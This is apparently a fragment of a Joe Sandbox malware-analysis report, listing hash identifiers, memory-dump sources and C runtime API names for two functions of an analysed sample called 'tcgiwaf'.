                                              • Instruction ID: 9566f0d9c998b8a9578f3bf21b14740b123dbd66f40548be3c8be446b7403278
                                              • Opcode Fuzzy Hash: 7af812c84f83da7910aacffbf650c5ec9dfb8aff5ddf6e7aab8b77b6688a95a4
                                              • Instruction Fuzzy Hash: 1D3124727002008FDB24DE4CD58096BB7BAEFD2710710453FE266AB7D1D735AD4587A9
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: _memcpy_s
                                              • String ID: h7@$h7@
                                              • API String ID: 2001391462-3958829557
                                              • Opcode ID: 745f913652764fe60ef523a7c6abb404847c15f27414de6a6407b1a095ecf8ff
                                              • Instruction ID: b46eb664321361753e2a3a964793c2e7909d50a0e214324b60adf7b2a6979654
                                              • Opcode Fuzzy Hash: 745f913652764fe60ef523a7c6abb404847c15f27414de6a6407b1a095ecf8ff
                                              • Instruction Fuzzy Hash: 62014CB1610605AFD708DF59D580A6AB375FB85310F0041AEE92567781C739B950CBE9
                                              APIs
                                                • Part of subcall function 00405359: __getptd.LIBCMT ref: 0040535F
                                                • Part of subcall function 00405359: __getptd.LIBCMT ref: 0040536F
                                              • __getptd.LIBCMT ref: 00409F8F
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 00409F9D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                              • String ID: csm
                                              • API String ID: 803148776-1018135373
                                              • Opcode ID: c0ce1d0d29b3558e020d2f3b56e83e559b5ab269ab1d48ab9c18dd40de057eb7
                                              • Instruction ID: 4600f6ba684a5a03787fd611c72d15dee9fc0ede12b87188f0516640ff6938b4
                                              • Opcode Fuzzy Hash: c0ce1d0d29b3558e020d2f3b56e83e559b5ab269ab1d48ab9c18dd40de057eb7
                                              • Instruction Fuzzy Hash: 4C014636801206CACF38AF25C4946AEB7B5AF14311F68443FF448B66D2DB388D80EF49